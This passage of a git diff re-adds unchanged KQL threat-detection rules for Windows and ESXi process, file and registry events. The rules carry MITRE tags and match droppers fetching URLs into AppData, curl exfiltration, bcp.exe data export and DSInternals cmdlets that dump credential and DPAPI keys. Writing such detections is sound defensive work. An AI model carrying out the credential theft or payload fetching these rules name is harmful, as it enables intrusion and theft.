used by several droppers (js/vbs > powershell) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105 -// False Positives: -// - High - -DeviceProcessEvents +// Title: Command Line Execution with Suspicious URL and AppData Strings +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105 +// False Positives: +// - High + +DeviceProcessEvents | where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql index 0683ba40..0a39ead9 100644 --- a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql +++ b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql @@ -1,10 +1,10 @@ -// Title: Computer Password Change Via Ksetup.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-06 -// Level: medium -// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe" -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Computer Password Change Via Ksetup.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-06 +// Level: medium +// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe" +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql index ab3422d1..157399cb 100644 --- a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql +++ b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql @@ -1,12 +1,12 @@ -// Title: Conhost.exe CommandLine Path Traversal -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-14 -// Level: high -// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Conhost.exe CommandLine Path Traversal +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-14 +// Level: high +// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost" \ No newline at end of file diff --git a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql index 912ec61c..759237ba 100644 --- a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql +++ b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql @@ -1,10 +1,10 @@ -// Title: Conhost Spawned By Uncommon Parent Process -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-28 -// Level: medium -// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Conhost Spawned By Uncommon Parent Process +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-28 +// Level: medium +// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC" or InitiatingProcessCommandLine contains "-k wusvcs -p -s WaaSMedicSvc"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql index 1fab717d..ad7a5ef6 100644 --- a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql +++ b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql @@ -1,10 +1,10 @@ -// Title: Csc.EXE Execution Form Potentially Suspicious Parent -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2019-02-11 -// Level: high -// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004 - -DeviceProcessEvents +// Title: Csc.EXE Execution Form Potentially Suspicious Parent +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2019-02-11 +// Level: high +// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004 + +DeviceProcessEvents | where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql index b8560c6d..69b37b3c 100644 --- a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql +++ b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql @@ -1,13 +1,13 @@ -// Title: Cscript/Wscript Potentially Suspicious Child Process -// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86') -// Date: 2023-05-15 -// Level: medium -// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. -// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. - -DeviceProcessEvents +// Title: Cscript/Wscript Potentially Suspicious Child Process +// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86') +// Date: 2023-05-15 +// Level: medium +// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. +// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith "\\rundll32.exe" or ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and ((ProcessCommandLine contains "mshta" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec")))) and (not(((ProcessCommandLine contains "UpdatePerUserSystemParameters" or ProcessCommandLine contains "PrintUIEntry" or ProcessCommandLine contains "ClearMyTracksByProcess") and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql index f7954e93..c0eb9fa8 100644 --- a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql +++ b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql @@ -1,10 +1,10 @@ -// Title: Cscript/Wscript Uncommon Script Extension Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007 - -DeviceProcessEvents +// Title: Cscript/Wscript Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceProcessEvents | where (ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/csexec_service_file_creation.kql b/KQL/rules/Execution/csexec_service_file_creation.kql index 1820c971..a1b7d6fa 100644 --- a/KQL/rules/Execution/csexec_service_file_creation.kql +++ b/KQL/rules/Execution/csexec_service_file_creation.kql @@ -1,10 +1,10 @@ -// Title: CSExec Service File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-04 -// Level: medium -// Description: Detects default CSExec service filename which indicates CSExec service installation and execution -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 - -DeviceFileEvents +// Title: CSExec Service File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-04 +// Level: medium +// Description: Detects default CSExec service filename which indicates CSExec service installation and execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002, attack.s0029 + +DeviceFileEvents | where FolderPath endswith "\\csexecsvc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql index 03909a9d..c0669df6 100644 --- a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql +++ b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql @@ -1,10 +1,10 @@ -// Title: Curl Web Request With Potential Custom User-Agent -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-27 -// Level: medium -// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Curl Web Request With Potential Custom User-Agent +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql index 5b99e218..91944e9b 100644 --- a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql +++ b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql @@ -1,13 +1,13 @@ -// Title: Data Export From MSSQL Table Via BCP.EXE -// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-08-20 -// Level: medium -// Description: Detects the execution of the BCP utility in order to export data from the database. -// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.exfiltration, attack.t1048 -// False Positives: -// - Legitimate data export operations. - -DeviceProcessEvents +// Title: Data Export From MSSQL Table Via BCP.EXE +// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-08-20 +// Level: medium +// Description: Detects the execution of the BCP utility in order to export data from the database. +// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.exfiltration, attack.t1048 +// False Positives: +// - Legitimate data export operations. + +DeviceProcessEvents | where (ProcessCommandLine contains " out " or ProcessCommandLine contains " queryout ") and (FolderPath endswith "\\bcp.exe" or ProcessVersionInfoOriginalFileName =~ "BCP.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql index b50d21a9..310d4825 100644 --- a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql +++ b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql @@ -1,13 +1,13 @@ -// Title: Detection of PowerShell Execution via Sqlps.exe -// Author: Agro (@agro_sev) oscd.community -// Date: 2020-10-10 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. -// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 -// False Positives: -// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. - -DeviceProcessEvents +// Title: Detection of PowerShell Execution via Sqlps.exe +// Author: Agro (@agro_sev) oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. +// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 +// False Positives: +// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql index fd2e17ce..91e634ef 100644 --- a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql +++ b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql @@ -1,10 +1,10 @@ -// Title: DotNET Assembly DLL Loaded Via Office Application -// Author: Antonlovesdnb -// Date: 2020-02-19 -// Level: medium -// Description: Detects any assembly DLL being loaded by an Office Product -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 - -DeviceImageLoadEvents +// Title: DotNET Assembly DLL Loaded Via Office Application +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: medium +// Description: Detects any assembly DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents | where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql index eaa5ea12..5f0d892e 100644 --- a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql +++ b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql @@ -1,13 +1,13 @@ -// Title: DSInternals Suspicious PowerShell Cmdlets -// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri -// Date: 2024-06-26 -// Level: high -// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. -// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Legitimate usage of DSInternals for administration or audit purpose. - -DeviceProcessEvents +// Title: DSInternals Suspicious PowerShell Cmdlets +// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri +// Date: 2024-06-26 +// Level: high +// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. +// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate usage of DSInternals for administration or audit purpose. + +DeviceProcessEvents | where ProcessCommandLine contains "Add-ADDBSidHistory" or ProcessCommandLine contains "Add-ADNgcKey" or ProcessCommandLine contains "Add-ADReplNgcKey" or ProcessCommandLine contains "ConvertFrom-ADManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-GPPrefPassword" or ProcessCommandLine contains "ConvertFrom-ManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-UnattendXmlPassword" or ProcessCommandLine contains "ConvertFrom-UnicodePassword" or ProcessCommandLine contains "ConvertTo-AADHash" or ProcessCommandLine contains "ConvertTo-GPPrefPassword" or ProcessCommandLine contains "ConvertTo-KerberosKey" or ProcessCommandLine contains "ConvertTo-LMHash" or ProcessCommandLine contains "ConvertTo-MsoPasswordHash" or ProcessCommandLine contains "ConvertTo-NTHash" or ProcessCommandLine contains "ConvertTo-OrgIdHash" or ProcessCommandLine contains "ConvertTo-UnicodePassword" or ProcessCommandLine contains "Disable-ADDBAccount" or ProcessCommandLine contains "Enable-ADDBAccount" or ProcessCommandLine contains "Get-ADDBAccount" or ProcessCommandLine contains "Get-ADDBBackupKey" or ProcessCommandLine contains "Get-ADDBDomainController" or ProcessCommandLine contains "Get-ADDBGroupManagedServiceAccount" or ProcessCommandLine contains "Get-ADDBKdsRootKey" or ProcessCommandLine contains "Get-ADDBSchemaAttribute" or ProcessCommandLine contains "Get-ADDBServiceAccount" or ProcessCommandLine contains "Get-ADDefaultPasswordPolicy" or ProcessCommandLine contains "Get-ADKeyCredential" or ProcessCommandLine contains "Get-ADPasswordPolicy" or ProcessCommandLine contains "Get-ADReplAccount" or ProcessCommandLine contains "Get-ADReplBackupKey" or ProcessCommandLine contains "Get-ADReplicationAccount" or ProcessCommandLine contains "Get-ADSIAccount" or ProcessCommandLine contains "Get-AzureADUserEx" or ProcessCommandLine contains "Get-BootKey" or ProcessCommandLine contains "Get-KeyCredential" or ProcessCommandLine contains "Get-LsaBackupKey" or ProcessCommandLine contains "Get-LsaPolicy" or ProcessCommandLine contains "Get-SamPasswordPolicy" or ProcessCommandLine contains "Get-SysKey" or ProcessCommandLine contains "Get-SystemKey" or ProcessCommandLine contains "New-ADDBRestoreFromMediaScript" or ProcessCommandLine contains "New-ADKeyCredential" or ProcessCommandLine contains "New-ADNgcKey" or ProcessCommandLine contains "New-NTHashSet" or ProcessCommandLine contains "Remove-ADDBObject" or ProcessCommandLine contains "Save-DPAPIBlob" or ProcessCommandLine contains "Set-ADAccountPasswordHash" or ProcessCommandLine contains "Set-ADDBAccountPassword" or ProcessCommandLine contains "Set-ADDBBootKey" or ProcessCommandLine contains "Set-ADDBDomainController" or ProcessCommandLine contains "Set-ADDBPrimaryGroup" or ProcessCommandLine contains "Set-ADDBSysKey" or ProcessCommandLine contains "Set-AzureADUserEx" or ProcessCommandLine contains "Set-LsaPolicy" or ProcessCommandLine contains "Set-SamAccountPasswordHash" or ProcessCommandLine contains "Set-WinUserPasswordHash" or ProcessCommandLine contains "Test-ADDBPasswordQuality" or ProcessCommandLine contains "Test-ADPasswordQuality" or ProcessCommandLine contains "Test-ADReplPasswordQuality" or ProcessCommandLine contains "Test-PasswordQuality" or ProcessCommandLine contains "Unlock-ADDBAccount" or ProcessCommandLine contains "Write-ADNgcKey" or ProcessCommandLine contains "Write-ADReplNgcKey" \ No newline at end of file diff --git a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql index 07c258fb..2c9d2428 100644 --- a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql +++ b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql @@ -1,10 +1,10 @@ -// Title: Enable BPF Kprobes Tracing -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-25 -// Level: medium -// Description: Detects common command used to enable bpf kprobes tracing -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion - -DeviceProcessEvents +// Title: Enable BPF Kprobes Tracing +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-25 +// Level: medium +// Description: Detects common command used to enable bpf kprobes tracing +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "/myprobe/enable" or ProcessCommandLine contains "/myretprobe/enable") and (ProcessCommandLine contains "echo 1 >" and ProcessCommandLine contains "/sys/kernel/debug/tracing/events/kprobes/") \ No newline at end of file diff --git a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql index 97a80aa1..9f357ea4 100644 --- a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql +++ b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql @@ -1,10 +1,10 @@ -// Title: Enable Microsoft Dynamic Data Exchange -// Author: frack113 -// Date: 2022-02-26 -// Level: medium -// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1559.002 - -DeviceRegistryEvents +// Title: Enable Microsoft Dynamic Data Exchange +// Author: frack113 +// Date: 2022-02-26 +// Level: medium +// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559.002 + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE") \ No newline at end of file diff --git a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql index f4bdd5fd..d0f42b99 100644 --- a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql +++ b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi VM Kill Via ESXCLI -// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi VM Kill Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "vm process" and ProcessCommandLine contains "kill") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql index 52739dd5..2d8999c7 100644 --- a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql +++ b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql @@ -1,10 +1,10 @@ -// Title: 